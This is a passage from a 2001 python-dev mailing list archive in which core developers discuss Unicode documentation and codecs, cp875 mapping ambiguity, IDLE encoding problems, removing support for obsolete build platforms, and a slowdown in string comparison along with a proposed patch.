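        except UnicodeEncodeError as exc:
            # 'strict' raises UnicodeEncodeError, a subclass of ValueError.
            results[errors] = exc
    return results


for handler, outcome in encode_all_ways("caf\u00e9").items():
    print(handler, repr(outcome))
```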

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encoding" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.
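A minimal Python 3 sketch of the decoding side. Here str(data, encoding, errors) plays the role of the old unicode(string, encoding, errors): it turns bytes into a Unicode string using a codec that is also reachable through the codecs module. A failure while *de*coding is reported as UnicodeDecodeError, which is also a ValueError subclass.

```python
import codecs

raw = b"caf\xc3\xa9"  # UTF-8 bytes for 'café'

# Decoding returns a text (Unicode) string.
text = str(raw, "utf-8")

# The same codec, reached through the codecs module.
assert text == codecs.decode(raw, "utf-8")
assert text == codecs.lookup("utf-8").decode(raw)[0]

# Bad input under the default 'strict' handler raises UnicodeDecodeError.
decode_failed = False
try:
    str(b"\xff", "utf-8")
except UnicodeDecodeError as exc:
    decode_failed = isinstance(exc, ValueError)

# Non-strict handlers: 'ignore' drops bad bytes, 'replace' inserts U+FFFD.
ignored = str(b"a\xffb", "utf-8", "ignore")
replaced = str(b"a\xffb", "utf-8", "replace")
```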

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry at digicool.com  Mon May 14 06:16:18 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
	<02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik at pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr at thyrsus.com  Mon May 14 07:20:17 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few things:

1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg at cosc.canterbury.ac.nz  Mon May 14 07:36:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack at oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design.

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 07:38:24 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal at lemburg.com  Mon May 14 11:02:19 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

Here are some more options:

* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)
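Both options can be sketched in a few lines of Python 3, assuming the encoding table is built by inverting a {byte: code point} decoding map. The map below is a hypothetical toy table, not the real cp875 data, and the helper names are illustrative. Keeping the lowest byte is an arbitrary choice; the point of sorting is only that the result no longer depends on dictionary or hash order.

```python
def build_encoding_map(decoding_map, ambiguous="lowest"):
    """Invert a {byte: code point} decoding map into {code point: byte}.

    ambiguous="lowest": walk items in sorted byte order and keep the first
        (lowest) byte for each code point, so the result is stable.
    ambiguous="undefined": map every code point with several candidate
        bytes to None, so that encoding it raises an error.
    """
    encoding_map = {}
    duplicates = set()
    for byte_value, code_point in sorted(decoding_map.items()):
        if code_point in encoding_map:
            duplicates.add(code_point)
        else:
            encoding_map[code_point] = byte_value
    if ambiguous == "undefined":
        for code_point in duplicates:
            encoding_map[code_point] = None
    return encoding_map


def charmap_encode(text, encoding_map):
    """Encode text with an inverted map; None or missing entries are errors."""
    out = bytearray()
    for ch in text:
        byte_value = encoding_map.get(ord(ch))
        if byte_value is None:
            raise UnicodeError("no unambiguous mapping for %r" % ch)
        out.append(byte_value)
    return bytes(out)


# Toy table: bytes 0x41 and 0xFD both decode to U+0041 'A'.
TOY_DECODING_MAP = {0x41: 0x0041, 0x42: 0x0042, 0xFD: 0x0041}

stable = build_encoding_map(TOY_DECODING_MAP)
strict = build_encoding_map(TOY_DECODING_MAP, ambiguous="undefined")
print(charmap_encode("AB", stable))   # b'AB'
```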

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 14 11:15:43 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far as it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Mon May 14 11:55:26 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik at pythonware.com  Mon May 14 12:18:49 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrence was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis at informatik.hu-berlin.de  Mon May 14 13:29:21 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types non-ASCII characters into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correctly IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis at informatik.hu-berlin.de  Mon May 14 13:41:26 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH at ActiveState.com  Mon May 14 14:20:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry at digicool.com  Mon May 14 14:54:59 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
	<3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much like as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr at thyrsus.com  Mon May 14 17:11:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik at pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip at pobox.com  Mon May 14 17:54:54 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completely confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g at Virginia.EDU  Mon May 14 19:04:56 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
 it's broken for OSX,
 even if it worked, it wouldn't do the whole job (I think framework
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and header files in one bundle.) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversible decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
them useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thoughts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've thought more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido at digicool.com  Mon May 14 22:53:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
             <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 21:40:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completely confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling.

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim at digicool.com  Mon May 14 22:12:44 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.
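Because timings on a busy (or Win9x) box are noisy, a common remedy is to repeat each measurement and keep the fastest run. The following is a sketch of the same experiment using the standard `timeit` module in present-day Python, where `time.clock` no longer exists. The operands are bound in the setup string so that the timed statement performs a real comparison. `best_time` is a hypothetical helper, not part of the original test program:

```python
import timeit


def best_time(stmt: str, setup: str = "pass",
              number: int = 100_000, repeat: int = 10) -> float:
    """Fastest of `repeat` timings, each running `stmt` `number` times."""
    # min() rather than the mean: slower runs mostly reflect interference
    # from other processes, not the code being measured.
    return min(timeit.repeat(stmt, setup=setup, number=number, repeat=repeat))


if __name__ == "__main__":
    # Bind operands in setup so the timed statement is a real comparison.
    cases = [("a < b", 'a, b = "ab", "cd"'),   # string compare
             ("a < b", "a, b = 2, 3")]         # int compare
    for stmt, setup in cases:
        print(f"{setup:22} {best_time(stmt, setup):.3f}")
```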

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 22:34:35 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for building Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 00:06:57 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op) {
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 23:55:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently get

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.
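The logic of the patch can be modelled in Python to make its two ideas explicit: a three-way compare whose result a switch turns into the requested outcome, and a shortcut for `Py_EQ` when the lengths differ. This is only a sketch. The operator names `"lt"` through `"ge"` are hypothetical stand-ins for `Py_LT` through `Py_GE`, and the `CACHE_HASH` check is omitted:

```python
def string_compare(a: str, b: str) -> int:
    """Three-way compare in the spirit of the C string_compare: -1, 0 or 1."""
    for ca, cb in zip(a, b):
        if ca != cb:
            return -1 if ca < cb else 1
    # Common prefix is equal, so the shorter string sorts first.
    return (len(a) > len(b)) - (len(a) < len(b))


# Translate a three-way result into each rich-comparison outcome,
# mirroring the switch statement in the patch.
OUTCOME = {
    "lt": lambda c: c < 0,
    "le": lambda c: c <= 0,
    "eq": lambda c: c == 0,
    "ne": lambda c: c != 0,
    "gt": lambda c: c > 0,
    "ge": lambda c: c >= 0,
}


def string_richcompare(a: str, b: object, op: str):
    if not isinstance(b, str):
        return NotImplemented           # let the other operand try
    if op == "eq" and len(a) != len(b):
        return False                    # unequal lengths can never be equal
    test = OUTCOME.get(op)
    if test is None:
        return NotImplemented           # unknown operator
    return test(string_compare(a, b))
```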

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
